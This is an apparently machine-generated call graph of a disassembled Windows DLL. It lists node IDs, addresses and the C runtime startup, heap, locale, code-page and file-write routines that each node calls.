19740->19744 19742 6fe41a2d EnterCriticalSection 19741->19742 19743 6fe41a4a ___DllMainCRTStartup 19741->19743 19742->19743 19743->19693 19745 6fe419f9 19744->19745 19746 6fe41a10 19745->19746 19748 6fe3e1d3 ___lock_fhandle InitializeCriticalSectionAndSpinCount 19745->19748 19811 6fe41a58 19746->19811 19748->19746 19750 6fe3f154 __write_nolock 19749->19750 19751 6fe3f186 19750->19751 19752 6fe3f1ad 19750->19752 19781 6fe3f17b 19750->19781 19753 6fe3535b __dosmaperr 62 API calls 19751->19753 19756 6fe3f215 19752->19756 19757 6fe3f1ef 19752->19757 19755 6fe3f18b 19753->19755 19754 6fe33f34 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 19758 6fe3f876 19754->19758 19760 6fe35348 __fptostr 62 API calls 19755->19760 19759 6fe3f229 19756->19759 19815 6fe3efa7 19756->19815 19761 6fe3535b __dosmaperr 62 API calls 19757->19761 19758->19700 19764 6fe3f99d __flswbuf 62 API calls 19759->19764 19763 6fe3f192 19760->19763 19765 6fe3f1f4 19761->19765 19766 6fe3815c __fptostr 6 API calls 19763->19766 19767 6fe3f234 19764->19767 19768 6fe35348 __fptostr 62 API calls 19765->19768 19766->19781 19770 6fe3f4da 19767->19770 19825 6fe3a27f 19767->19825 19769 6fe3f1fd 19768->19769 19771 6fe3815c __fptostr 6 API calls 19769->19771 19772 6fe3f4ea 19770->19772 19773 6fe3f7a9 WriteFile 19770->19773 19771->19781 19777 6fe3f5c8 19772->19777 19798 6fe3f4fe 19772->19798 19775 6fe3f4bc 19773->19775 19776 6fe3f7dc GetLastError 19773->19776 19779 6fe3f827 19775->19779 19775->19781 19784 6fe3f7fa 19775->19784 19776->19775 19796 6fe3f6a8 19777->19796 19800 6fe3f5d7 19777->19800 19779->19781 19783 6fe35348 __fptostr 62 API calls 19779->19783 19780 6fe3f27a 19780->19770 19782 6fe3f28c GetConsoleCP 19780->19782 19781->19754 19782->19775 19795 6fe3f2af 19782->19795 19786 6fe3f84a 19783->19786 19788 6fe3f805 19784->19788 19789 6fe3f819 19784->19789 19785 6fe3f56c WriteFile 19785->19776 19785->19798 19790 6fe3535b __dosmaperr 62 API calls 19786->19790 19787 6fe3f70e WideCharToMultiByte 19787->19776 19792 6fe3f745 WriteFile 19787->19792 19791 6fe35348 __fptostr 62 API calls 19788->19791 19833 6fe3536e 19789->19833 19790->19781 19799 6fe3f80a 19791->19799 19792->19796 19797 6fe3f77c GetLastError 19792->19797 19793 6fe3f64c WriteFile 19793->19776 19793->19800 19795->19775 19795->19776 19803 6fe40932 74 API calls __fassign 19795->19803 19804 6fe3f35b WideCharToMultiByte 19795->19804 19806 6fe41a88 11 API calls __putwch_nolock 19795->19806 19807 6fe3f3e0 WriteFile 19795->19807 19830 6fe40984 19795->19830 19796->19775 19796->19779 19796->19787 19796->19792 19797->19796 19798->19775 19798->19779 19798->19785 19802 6fe3535b __dosmaperr 62 API calls 19799->19802 19800->19775 19800->19779 19800->19793 19802->19781 19803->19795 19804->19775 19805 6fe3f38c WriteFile 19804->19805 19805->19776 19805->19795 19806->19795 19807->19776 19807->19795 19854 6fe41a61 LeaveCriticalSection 19808->19854 19810 6fe3f952 19810->19697 19814 6fe3a83a LeaveCriticalSection 19811->19814 19813 6fe41a5f 19813->19741 19814->19813 19838 6fe4194a 19815->19838 19817 6fe3efc5 19818 6fe3efde SetFilePointer 19817->19818 19819 6fe3efcd 19817->19819 19821 6fe3eff6 GetLastError 19818->19821 19822 6fe3efd2 19818->19822 19820 6fe35348 __fptostr 62 API calls 19819->19820 19820->19822 19821->19822 19823 6fe3f000 19821->19823 19822->19759 19824 6fe3536e __dosmaperr 62 API calls 19823->19824 19824->19822 19826 6fe3a206 __getptd_noexit 62 API calls 19825->19826 19827 6fe3a287 19826->19827 19828 6fe3a294 GetConsoleMode 19827->19828 19829 6fe35bff __amsg_exit 62 API calls 19827->19829 19828->19770 19828->19780 19829->19828 19851 6fe4094c 19830->19851 19834 6fe3535b __dosmaperr 62 API calls 19833->19834 19835 6fe35379 __dosmaperr 19834->19835 19836 6fe35348 __fptostr 62 API calls 19835->19836 19837 6fe3538c 19836->19837 19837->19781 19839 6fe41957 19838->19839 19840 6fe4196f 19838->19840 19841 6fe3535b __dosmaperr 62 API calls 19839->19841 19843 6fe3535b __dosmaperr 62 API calls 19840->19843 19850 6fe419b4 19840->19850 19842 6fe4195c 19841->19842 19844 6fe35348 __fptostr 62 API calls 19842->19844 19845 6fe4199d 19843->19845 19846 6fe41964 19844->19846 19847 6fe35348 __fptostr 62 API calls 19845->19847 19846->19817 19848 6fe419a4 19847->19848 19849 6fe3815c __fptostr 6 API calls 19848->19849 19849->19850 19850->19817 19852 6fe38659 _LocaleUpdate::_LocaleUpdate 72 API calls 19851->19852 19853 6fe4095f 19852->19853 19853->19795 19854->19810 19858 6fe41a61 LeaveCriticalSection 19855->19858 19857 6fe3f143 19857->19729 19858->19857 19860 6fe27352 __EH_prolog3_catch_GS 19859->19860 19861 6fe27202 ctype 66 API calls 19860->19861 19863 6fe27381 ctype 19860->19863 19861->19863 19865 6fe351c4 19863->19865 19866 6fe33f34 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 19865->19866 19867 6fe351ce 19866->19867 19867->19867 19868 6fe472b3 19871 6fe28495 19868->19871 19872 6fe2aef1 ctype 31 API calls 19871->19872 19873 6fe284a0 19872->19873 19874 6fe2c220 ctype 7 API calls 19873->19874 19875 6fe284a9 19874->19875 19876 6fe2bbbf ctype 2 API calls 19875->19876 19877 6fe284b4 19876->19877 19878 6fe2c292 ctype 3 API calls 19877->19878 19879 6fe284bb 19878->19879 19880 6fe3498c 19881 6fe34997 19880->19881 19882 6fe3499c 19880->19882 19898 6fe3be02 19881->19898 19886 6fe34896 19882->19886 19885 6fe349aa 19888 6fe348a2 ___DllMainCRTStartup 19886->19888 19887 6fe348ef 19890 6fe3493f ___DllMainCRTStartup 19887->19890 19949 6fe26894 19887->19949 19888->19887 19888->19890 19902 6fe34761 19888->19902 19890->19885 19893 6fe3491f 19893->19890 19895 6fe34761 __CRT_INIT@12 155 API calls 19893->19895 19894 6fe26894 ___DllMainCRTStartup 31 API calls 19896 6fe34916 19894->19896 19895->19890 19897 6fe34761 __CRT_INIT@12 155 API calls 19896->19897 19897->19893 19899 6fe3be27 19898->19899 19900 6fe3be34 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 19898->19900 19899->19900 19901 6fe3be2b 19899->19901 19900->19901 19901->19882 19903 6fe34770 19902->19903 19904 6fe347ec 19902->19904 19953 6fe3a6f4 HeapCreate 19903->19953 19906 6fe34823 19904->19906 19911 6fe347f2 19904->19911 19907 6fe34881 19906->19907 19908 6fe34828 19906->19908 19926 6fe3477b 19907->19926 20089 6fe3a3c8 19907->20089 19910 6fe3a0ae ___set_flsgetvalue 8 API calls 19908->19910 19916 6fe3482d 19910->19916 19912 6fe3480d 19911->19912 19911->19926 20086 6fe35e85 19911->20086 19918 6fe3b77d __ioterm 63 API calls 19912->19918 19912->19926 19919 6fe3a608 __calloc_crt 62 API calls 19916->19919 19917 6fe34787 __RTC_Initialize 19920 6fe3478b 19917->19920 19928 6fe34797 GetCommandLineA 19917->19928 19921 6fe34817 19918->19921 19922 6fe34839 19919->19922 20064 6fe3a724 19920->20064 19924 6fe3a0e2 __mtterm 65 API calls 19921->19924 19925 6fe3a033 __decode_pointer 6 API calls 19922->19925 19922->19926 19927 6fe3481c 19924->19927 19929 6fe34857 19925->19929 19926->19887 19930 6fe3a724 __heap_term 4 API calls 19927->19930 19989 6fe3bafe 19928->19989 19934 6fe34875 19929->19934 19935 6fe3485e 19929->19935 19930->19926 19938 6fe34618 __crtGetStringTypeA_stat 62 API calls 19934->19938 19937 6fe3a11f __mtinit 62 API calls 19935->19937 19936 6fe347b1 19939 6fe347b5 19936->19939 20030 6fe3ba43 19936->20030 19941 6fe34865 GetCurrentThreadId 19937->19941 19938->19926 20070 6fe3a0e2 19939->20070 19941->19926 19944 6fe347d5 19944->19926 20081 6fe3b77d 19944->20081 19950 6fe268a2 19949->19950 19952 6fe267cb 19949->19952 19951 6fe2aef1 ctype 31 API calls 19950->19951 19950->19952 19951->19952 19952->19893 19952->19894 19954 6fe34776 19953->19954 19954->19926 19955 6fe3a436 GetModuleHandleW 19954->19955 19956 6fe3a451 19955->19956 19957 6fe3a44a 19955->19957 19959 6fe3a45b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 19956->19959 19960 6fe3a5b9 19956->19960 19958 6fe35bcf __crt_waiting_on_module_handle 2 API calls 19957->19958 19961 6fe3a450 19958->19961 19962 6fe3a4a4 TlsAlloc 19959->19962 19963 6fe3a0e2 __mtterm 65 API calls 19960->19963 19961->19956 19965 6fe3a5be 19962->19965 19966 6fe3a4f2 TlsSetValue 19962->19966 19963->19965 19965->19917 19966->19965 19967 6fe3a503 19966->19967 20100 6fe35e94 19967->20100 19970 6fe39fb8 __encode_pointer 6 API calls 19971 6fe3a513 19970->19971 19972 6fe39fb8 __encode_pointer 6 API calls 19971->19972 19973 6fe3a523 19972->19973 19974 6fe39fb8 __encode_pointer 6 API calls 19973->19974 19975 6fe3a533 19974->19975 19976 6fe39fb8 __encode_pointer 6 API calls 19975->19976 19977 6fe3a543 19976->19977 20107 6fe3a798 19977->20107 19980 6fe3a033 __decode_pointer 6 API calls 19981 6fe3a564 19980->19981 19981->19960 19982 6fe3a608 __calloc_crt 62 API calls 19981->19982 19983 6fe3a57d 19982->19983 19983->19960 19984 6fe3a033 __decode_pointer 6 API calls 19983->19984 19985 6fe3a597 19984->19985 19985->19960 19986 6fe3a59e 19985->19986 19987 6fe3a11f __mtinit 62 API calls 19986->19987 19988 6fe3a5a6 GetCurrentThreadId 19987->19988 19988->19965 19990 6fe3bb3b 19989->19990 19991 6fe3bb1c GetEnvironmentStringsW 19989->19991 19993 6fe3bb24 19990->19993 19994 6fe3bbd4 19990->19994 19992 6fe3bb30 GetLastError 19991->19992 19991->19993 19992->19990 19995 6fe3bb57 GetEnvironmentStringsW 19993->19995 20000 6fe3bb66 WideCharToMultiByte 19993->20000 19996 6fe3bbdd GetEnvironmentStrings 19994->19996 19997 6fe347a7 19994->19997 19995->19997 19995->20000 19996->19997 20003 6fe3bbed 19996->20003 20015 6fe3b529 19997->20015 20001 6fe3bb9a 20000->20001 20002 6fe3bbc9 FreeEnvironmentStringsW 20000->20002 20005 6fe3a5c3 __malloc_crt 62 API calls 20001->20005 20002->19997 20004 6fe3a5c3 __malloc_crt 62 API calls 20003->20004 20006 6fe3bc07 20004->20006 20007 6fe3bba0 20005->20007 20008 6fe3bc1a ___crtGetEnvironmentStringsA 20006->20008 20009 6fe3bc0e FreeEnvironmentStringsA 20006->20009 20007->20002 20010 6fe3bba8 WideCharToMultiByte 20007->20010 20013 6fe3bc24 FreeEnvironmentStringsA 20008->20013 20009->19997 20011 6fe3bbc2 20010->20011 20012 6fe3bbba 20010->20012 20011->20002 20014 6fe34618 __crtGetStringTypeA_stat 62 API calls 20012->20014 20013->19997 20014->20011 20114 6fe353bc 20015->20114 20017 6fe3b535 GetStartupInfoA 20018 6fe3a608 __calloc_crt 62 API calls 20017->20018 20026 6fe3b556 20018->20026 20019 6fe3b774 ___DllMainCRTStartup 20019->19936 20020 6fe3b63e 20020->20019 20023 6fe3b6bb 20020->20023 20028 6fe3b667 GetFileType 20020->20028 20029 6fe3e1d3 ___lock_fhandle InitializeCriticalSectionAndSpinCount 20020->20029 20021 6fe3b6f1 GetStdHandle 20021->20023 20022 6fe3b756 SetHandleCount 20022->20019 20023->20019 20023->20021 20023->20022 20025 6fe3b703 GetFileType 20023->20025 20027 6fe3e1d3 ___lock_fhandle InitializeCriticalSectionAndSpinCount 20023->20027 20024 6fe3a608 __calloc_crt 62 API calls 20024->20026 20025->20023 20026->20019 20026->20020 20026->20023 20026->20024 20027->20023 20028->20020 20029->20020 20031 6fe3ba58 20030->20031 20032 6fe3ba5d GetModuleFileNameA 20030->20032 20121 6fe402ad 20031->20121 20033 6fe3ba84 20032->20033 20115 6fe3b8a9 20033->20115 20037 6fe347c1 20037->19944 20043 6fe3b7cb 20037->20043 20038 6fe3bac0 20039 6fe3a5c3 __malloc_crt 62 API calls 20038->20039 20040 6fe3bac6 20039->20040 20040->20037 20041 6fe3b8a9 _parse_cmdline 72 API calls 20040->20041 20042 6fe3bae0 20041->20042 20042->20037 20044 6fe3b7d4 20043->20044 20048 6fe3b7d9 _strlen 20043->20048 20045 6fe402ad ___initmbctable 106 API calls 20044->20045 20045->20048 20046 6fe347ca 20046->19944 20058 6fe35cbe 20046->20058 20047 6fe3a608 __calloc_crt 62 API calls 20049 6fe3b80e _strlen 20047->20049 20048->20046 20048->20047 20049->20046 20050 6fe3b86c 20049->20050 20052 6fe3a608 __calloc_crt 62 API calls 20049->20052 20053 6fe3b892 20049->20053 20055 6fe40997 _strcpy_s 62 API calls 20049->20055 20056 6fe3b853 20049->20056 20051 6fe34618 __crtGetStringTypeA_stat 62 API calls 20050->20051 20051->20046 20052->20049 20054 6fe34618 __crtGetStringTypeA_stat 62 API calls 20053->20054 20054->20046 20055->20049 20056->20049 20057 6fe38034 __invoke_watson 10 API calls 20056->20057 20057->20056 20059 6fe35ccc __IsNonwritableInCurrentImage 20058->20059 20408 6fe3df82 20059->20408 20061 6fe35cea __initterm_e 20063 6fe35d09 __IsNonwritableInCurrentImage __initterm 20061->20063 20412 6fe344b4 20061->20412 20063->19944 20065 6fe3a784 HeapDestroy 20064->20065 20066 6fe3a72d 20064->20066 20065->19926 20067 6fe3a772 HeapFree 20066->20067 20068 6fe3a749 VirtualFree HeapFree 20066->20068 20067->20065 20068->20068 20069 6fe3a771 20068->20069 20069->20067 20071 6fe3a0f8 20070->20071 20072 6fe3a0ec 20070->20072 20073 6fe3a10c TlsFree 20071->20073 20075 6fe3a11a 20071->20075 20074 6fe3a033 __decode_pointer 6 API calls 20072->20074 20073->20075 20074->20071 20076 6fe3a7ff DeleteCriticalSection 20075->20076 20077 6fe3a817 20075->20077 20078 6fe34618 __crtGetStringTypeA_stat 62 API calls 20076->20078 20079 6fe3a837 20077->20079 20080 6fe3a829 DeleteCriticalSection 20077->20080 20078->20075 20079->19920 20080->20077 20083 6fe3b786 20081->20083 20082 6fe3b7c8 20082->19939 20083->20082 20084 6fe3b79a DeleteCriticalSection 20083->20084 20085 6fe34618 __crtGetStringTypeA_stat 62 API calls 20083->20085 20084->20083 20085->20083 20458 6fe35d43 20086->20458 20088 6fe35e90 20088->19912 20090 6fe3a421 20089->20090 20091 6fe3a3d6 20089->20091 20092 6fe3a434 20090->20092 20093 6fe3a42b TlsSetValue 20090->20093 20094 6fe3a3dc TlsGetValue 20091->20094 20096 6fe3a3ff 20091->20096 20092->19926 20093->20092 20094->20096 20097 6fe3a3ef TlsGetValue 20094->20097 20095 6fe3a033 __decode_pointer 6 API calls 20098 6fe3a416 20095->20098 20096->20095 20097->20096 20481 6fe3a299 20098->20481 20101 6fe3a02a __init_pointers 6 API calls 20100->20101 20102 6fe35e9c __init_pointers __initp_misc_winsig 20101->20102 20111 6fe3cdf3 20102->20111 20105 6fe39fb8 __encode_pointer 6 API calls 20106 6fe35ed8 20105->20106 20106->19970 20108 6fe3a7a3 20107->20108 20109 6fe3e1d3 ___lock_fhandle InitializeCriticalSectionAndSpinCount 20108->20109 20110 6fe3a550 20108->20110 20109->20108 20110->19960 20110->19980 20112 6fe39fb8 __encode_pointer 6 API calls 20111->20112 20113 6fe35ece 20112->20113 20113->20105 20114->20017 20117 6fe3b8c8 20115->20117 20119 6fe3b935 20117->20119 20125 6fe40a52 20117->20125 20118 6fe3ba33 20118->20037 20118->20038 20119->20118 20120 6fe40a52 72 API calls _parse_cmdline 20119->20120 20120->20119 20122 6fe402b6 20121->20122 20123 6fe402bd 20121->20123 20230 6fe40113 20122->20230 20123->20032 20128 6fe409ff 20125->20128 20131 6fe38659 20128->20131 20132 6fe3866c 20131->20132 20138 6fe386b9 20131->20138 20133 6fe3a27f __getptd 62 API calls 20132->20133 20134 6fe38671 20133->20134 20135 6fe38699 20134->20135 20139 6fe4057a 20134->20139 20135->20138 20154 6fe3fe0e 20135->20154 20138->20117 20140 6fe40586 ___DllMainCRTStartup 20139->20140 20141 6fe3a27f __getptd 62 API calls 20140->20141 20142 6fe4058b 20141->20142 20143 6fe405b9 20142->20143 20145 6fe4059d 20142->20145 20144 6fe3a914 __lock 62 API calls 20143->20144 20146 6fe405c0 20144->20146 20147 6fe3a27f __getptd 62 API calls 20145->20147 20170 6fe4053c 20146->20170 20149 6fe405a2 20147->20149 20152 6fe405b0 ___DllMainCRTStartup 20149->20152 20153 6fe35bff __amsg_exit 62 API calls 20149->20153 20152->20135 20153->20152 20155 6fe3fe1a ___DllMainCRTStartup 20154->20155 20156 6fe3a27f __getptd 62 API calls 20155->20156 20157 6fe3fe1f 20156->20157 20158 6fe3a914 __lock 62 API calls 20157->20158 20159 6fe3fe31 20157->20159 20160 6fe3fe4f 20158->20160 20162 6fe3fe3f ___DllMainCRTStartup 20159->20162 20166 6fe35bff __amsg_exit 62 API calls 20159->20166 20161 6fe3fe98 20160->20161 20163 6fe3fe80 InterlockedIncrement 20160->20163 20164 6fe3fe66 InterlockedDecrement 20160->20164 20226 6fe3fea9 20161->20226 20162->20138 20163->20161 20164->20163 20167 6fe3fe71 20164->20167 20166->20162 20167->20163 20168 6fe34618 __crtGetStringTypeA_stat 62 API calls 20167->20168 20169 6fe3fe7f 20168->20169 20169->20163 20171 6fe40540 20170->20171 20172 6fe40572 20170->20172 20171->20172 20173 6fe40414 ___addlocaleref 8 API calls 20171->20173 20178 6fe405e4 20172->20178 20174 6fe40553 20173->20174 20174->20172 20181 6fe404a3 20174->20181 20225 6fe3a83a LeaveCriticalSection 20178->20225 20180 6fe405eb 20180->20149 20182 6fe404b4 InterlockedDecrement 20181->20182 20183 6fe40537 20181->20183 20184 6fe404cc 20182->20184 20185 6fe404c9 InterlockedDecrement 20182->20185 20183->20172 20195 6fe402cb 20183->20195 20186 6fe404d6 InterlockedDecrement 20184->20186 20187 6fe404d9 20184->20187 20185->20184 20186->20187 20188 6fe404e6 20187->20188 20189 6fe404e3 InterlockedDecrement 20187->20189 20190 6fe404f0 InterlockedDecrement 20188->20190 20191 6fe404f3 20188->20191 20189->20188 20190->20191 20192 6fe4050c InterlockedDecrement 20191->20192 20193 6fe4051c InterlockedDecrement 20191->20193 20194 6fe40527 InterlockedDecrement 20191->20194 20192->20191 20193->20191 20194->20183 20197 6fe4034f 20195->20197 20202 6fe402e2 20195->20202 20196 6fe4039c 20200 6fe42365 ___free_lc_time 62 API calls 20196->20200 20210 6fe403c3 20196->20210 20197->20196 20198 6fe34618 __crtGetStringTypeA_stat 62 API calls 20197->20198 20201 6fe40370 20198->20201 20199 6fe40316 20204 6fe40337 20199->20204 20215 6fe34618 __crtGetStringTypeA_stat 62 API calls 20199->20215 20203 6fe403bc 20200->20203 20205 6fe34618 __crtGetStringTypeA_stat 62 API calls 20201->20205 20202->20197 20202->20199 20208 6fe34618 __crtGetStringTypeA_stat 62 API calls 20202->20208 20209 6fe34618 __crtGetStringTypeA_stat 62 API calls 20203->20209 20206 6fe34618 __crtGetStringTypeA_stat 62 API calls 20204->20206 20211 6fe40383 20205->20211 20212 6fe40344 20206->20212 20207 6fe40408 20213 6fe34618 __crtGetStringTypeA_stat 62 API calls 20207->20213 20214 6fe4030b 20208->20214 20209->20210 20210->20207 20216 6fe34618 62 API calls __crtGetStringTypeA_stat 20210->20216 20217 6fe34618 __crtGetStringTypeA_stat 62 API calls 20211->20217 20218 6fe34618 __crtGetStringTypeA_stat 62 API calls 20212->20218 20219 6fe4040e 20213->20219 20220 6fe4253f ___free_lconv_mon 62 API calls 20214->20220 20221 6fe4032c 20215->20221 20216->20210 20222 6fe40391 20217->20222 20218->20197 20219->20172 20220->20199 20223 6fe424fa ___free_lconv_num 62 API calls 20221->20223 20224 6fe34618 __crtGetStringTypeA_stat 62 API calls 20222->20224 20223->20204 20224->20196 20225->20180 20229 6fe3a83a LeaveCriticalSection 20226->20229 20228 6fe3feb0 20228->20159 20229->20228 20231 6fe4011f ___DllMainCRTStartup 20230->20231 20232 6fe3a27f __getptd 62 API calls 20231->20232 20233 6fe40128 20232->20233 20234 6fe3fe0e _LocaleUpdate::_LocaleUpdate 64 API calls 20233->20234 20235 6fe40132 20234->20235 20261 6fe3feb2 20235->20261 20238 6fe3a5c3 __malloc_crt 62 API calls 20239 6fe40153 20238->20239 20240 6fe40272 ___DllMainCRTStartup 20239->20240 20268 6fe3ff2e 20239->20268 20240->20123 20243 6fe40183 InterlockedDecrement 20245 6fe401a4 InterlockedIncrement 20243->20245 20246 6fe40193 20243->20246 20244 6fe4027f 20244->20240 20248 6fe40292 20244->20248 20249 6fe34618 __crtGetStringTypeA_stat 62 API calls 20244->20249 20245->20240 20247 6fe401ba 20245->20247 20246->20245 20251 6fe34618 __crtGetStringTypeA_stat 62 API calls 20246->20251 20247->20240 20252 6fe3a914 __lock 62 API calls 20247->20252 20250 6fe35348 __fptostr 62 API calls 20248->20250 20249->20248 20250->20240 20253 6fe401a3 20251->20253 20255 6fe401ce InterlockedDecrement 20252->20255 20253->20245 20256 6fe4025d InterlockedIncrement 20255->20256 20257 6fe4024a 20255->20257 20278 6fe40274 20256->20278 20257->20256 20259 6fe34618 __crtGetStringTypeA_stat 62 API calls 20257->20259 20260 6fe4025c 20259->20260 20260->20256 20262 6fe38659 _LocaleUpdate::_LocaleUpdate 72 API calls 20261->20262 20263 6fe3fec6 20262->20263 20264 6fe3fed1 GetOEMCP 20263->20264 20265 6fe3feef 20263->20265 20267 6fe3fee1 20264->20267 20266 6fe3fef4 GetACP 20265->20266 20265->20267 20266->20267 20267->20238 20267->20240 20269 6fe3feb2 getSystemCP 74 API calls 20268->20269 20270 6fe3ff4e 20269->20270 20271 6fe3ffc2 _memset __setmbcp_nolock 20270->20271 20272 6fe3ff59 setSBCS 20270->20272 20274 6fe3ff9d IsValidCodePage 20270->20274 20281 6fe3fc7b GetCPInfo 20271->20281 20273 6fe33f34 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20272->20273 20275 6fe40111 20273->20275 20274->20272 20276 6fe3ffaf GetCPInfo 20274->20276 20275->20243 20275->20244 20276->20271 20276->20272 20407 6fe3a83a LeaveCriticalSection 20278->20407 20280 6fe4027b 20280->20240 20282 6fe3fd61 20281->20282 20284 6fe3fcaf _memset 20281->20284 20287 6fe33f34 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20282->20287 20291 6fe42323 20284->20291 20289 6fe3fe0c 20287->20289 20289->20271 20290 6fe42124 ___crtLCMapStringA 97 API calls 20290->20282 20292 6fe38659 _LocaleUpdate::_LocaleUpdate 72 API calls 20291->20292 20293 6fe42336 20292->20293 20301 6fe42169 20293->20301 20296 6fe42124 20297 6fe38659 _LocaleUpdate::_LocaleUpdate 72 API calls 20296->20297 20298 6fe42137 20297->20298 20360 6fe41d7f 20298->20360 20302 6fe421b5 20301->20302 20303 6fe4218a GetStringTypeW 20301->20303 20304 6fe421a2 20302->20304 20306 6fe4229c 20302->20306 20303->20304 20305 6fe421aa GetLastError 20303->20305 20307 6fe421ee MultiByteToWideChar 20304->20307 20315 6fe42296 20304->20315 20305->20302 20329 6fe44dbc GetLocaleInfoA 20306->20329 20308 6fe4221b 20307->20308 20307->20315 20317 6fe349fe _malloc 62 API calls 20308->20317 20324 6fe42230 _memset __crtGetStringTypeA_stat 20308->20324 20310 6fe33f34 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20311 6fe3fd1c 20310->20311 20311->20296 20313 6fe422ed GetStringTypeA 20313->20315 20316 6fe42308 20313->20316 20314 6fe42269 MultiByteToWideChar 20320 6fe42290 20314->20320 20321 6fe4227f GetStringTypeW 20314->20321 20315->20310 20322 6fe34618 __crtGetStringTypeA_stat 62 API calls 20316->20322 20317->20324 20325 6fe41006 20320->20325 20321->20320 20322->20315 20324->20314 20324->20315 20326 6fe41012 20325->20326 20328 6fe41023 20325->20328 20327 6fe34618 __crtGetStringTypeA_stat 62 API calls 20326->20327 20326->20328 20327->20328 20328->20315 20330 6fe44def 20329->20330 20331 6fe44dea 20329->20331 20332 6fe41026 ___ansicp 85 API calls 20330->20332 20333 6fe33f34 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20331->20333 20332->20331 20334 6fe422c0 20333->20334 20334->20313 20334->20315 20335 6fe44e05 20334->20335 20336 6fe44e45 GetCPInfo 20335->20336 20340 6fe44ecf 20335->20340 20337 6fe44e5c 20336->20337 20338 6fe44eba MultiByteToWideChar 20336->20338 20337->20338 20341 6fe44e62 GetCPInfo 20337->20341 20338->20340 20345 6fe44e75 _strlen 20338->20345 20339 6fe33f34 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20343 6fe422e1 20339->20343 20340->20339 20341->20338 20344 6fe44e6f 20341->20344 20342 6fe44ea7 _memset __crtGetStringTypeA_stat 20342->20340 20347 6fe44f04 MultiByteToWideChar 20342->20347 20343->20313 20343->20315 20344->20338 20344->20345 20345->20342 20346 6fe349fe _malloc 62 API calls 20345->20346 20346->20342 20348 6fe44f1c 20347->20348 20349 6fe44f3b 20347->20349 20351 6fe44f40 20348->20351 20352 6fe44f23 WideCharToMultiByte 20348->20352 20350 6fe41006 __freea 62 API calls 20349->20350 20350->20340 20353 6fe44f5f 20351->20353 20354 6fe44f4b WideCharToMultiByte 20351->20354 20352->20349 20355 6fe3a608 __calloc_crt 62 API calls 20353->20355 20354->20349 20354->20353 20356 6fe44f67 20355->20356 20356->20349 20357 6fe44f70 WideCharToMultiByte 20356->20357 20357->20349 20358 6fe44f82 20357->20358 20359 6fe34618 __crtGetStringTypeA_stat 62 API calls 20358->20359 20359->20349 20361 6fe41da0 LCMapStringW 20360->20361 20362 6fe41dbb 20360->20362 20361->20362 20363 6fe41dc3 GetLastError 20361->20363 20364 6fe41fb9 20362->20364 20365 6fe41e15 20362->20365 20363->20362 20366 6fe44dbc ___ansicp 86 API calls 20364->20366 20367 6fe41e2e MultiByteToWideChar 20365->20367 20390 6fe41fb0 20365->20390 20369 6fe41fe1 20366->20369 20373 6fe41e5b 20367->20373 20367->20390 20368 6fe33f34 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20370 6fe3fd3c 20368->20370 20371 6fe420d5 LCMapStringA 20369->20371 20372 6fe41ffa 20369->20372 20369->20390 20370->20290 20374 6fe42031 20371->20374 20375 6fe44e05 ___convertcp 69 API calls 20372->20375 20380 6fe349fe _malloc 62 API calls 20373->20380 20387 6fe41e74 __crtGetStringTypeA_stat 20373->20387 20379 6fe420fc 20374->20379 20383 6fe34618 __crtGetStringTypeA_stat 62 API calls 20374->20383 20381 6fe4200c 20375->20381 20376 6fe41eac MultiByteToWideChar 20377 6fe41ec5 LCMapStringW 20376->20377 20378 6fe41fa7 20376->20378 20377->20378 20382 6fe41ee6 20377->20382 20385 6fe41006 __freea 62 API calls 20378->20385 20388 6fe34618 __crtGetStringTypeA_stat 62 API calls 20379->20388 20379->20390 20380->20387 20384 6fe42016 LCMapStringA 20381->20384 20381->20390 20386 6fe41eef 20382->20386 20392 6fe41f18 20382->20392 20383->20379 20384->20374 20393 6fe42038 20384->20393 20385->20390 20386->20378 20389 6fe41f01 LCMapStringW 20386->20389 20387->20376 20387->20390 20388->20390 20389->20378 20390->20368 20391 6fe41f67 LCMapStringW 20395 6fe41fa1 20391->20395 20396 6fe41f7f WideCharToMultiByte 20391->20396 20398 6fe41f33 __crtGetStringTypeA_stat 20392->20398 20399 6fe349fe _malloc 62 API calls 20392->20399 20394 6fe42049 _memset __crtGetStringTypeA_stat 20393->20394 20397 6fe349fe _malloc 62 API calls 20393->20397 20394->20374 20401 6fe42087 LCMapStringA 20394->20401 20400 6fe41006 __freea 62 API calls 20395->20400 20396->20395 20397->20394 20398->20378 20398->20391 20399->20398 20400->20378 20403 6fe420a7 20401->20403 20404 6fe420a3 20401->20404 20405 6fe44e05 ___convertcp 69 API calls 20403->20405 20406 6fe41006 __freea 62 API calls 20404->20406 20405->20404 20406->20374 20407->20280 20409 6fe3df88 20408->20409 20410 6fe39fb8 __encode_pointer 6 API calls 20409->20410 20411 6fe3dfa0 20409->20411 20410->20409 20411->20061 20415 6fe34478 20412->20415 20414 6fe344c1 20414->20063 20416 6fe34484 ___DllMainCRTStartup 20415->20416 20423 6fe35c6b 20416->20423 20422 6fe344a5 ___DllMainCRTStartup 20422->20414 20424 6fe3a914 __lock 62 API calls 20423->20424 20425 6fe34489 20424->20425 20426 6fe3438d 20425->20426 20427 6fe3a033 __decode_pointer 6 API calls 20426->20427 20428 6fe343a1 20427->20428 20429 6fe3a033 __decode_pointer 6 API calls 20428->20429 20430 6fe343b1 20429->20430 20431 6fe34434 20430->20431 20432 6fe37637 __msize 63 API calls 20430->20432 20446 6fe344ae 20431->20446 20433 6fe343cf 20432->20433 20436 6fe343ea 20433->20436 20437 6fe343f9 20433->20437 20445 6fe3441b 20433->20445 20434 6fe39fb8 __encode_pointer 6 API calls 20435 6fe34429 20434->20435 20439 6fe39fb8 __encode_pointer 6 API calls 20435->20439 20449 6fe3a654 20436->20449 20437->20431 20438 6fe343f3 20437->20438 20438->20437 20441 6fe3a654 __realloc_crt 72 API calls 20438->20441 20442 6fe3440f 20438->20442 20439->20431 20443 6fe34409 20441->20443 20444 6fe39fb8 __encode_pointer 6 API calls 20442->20444 20443->20431 20443->20442 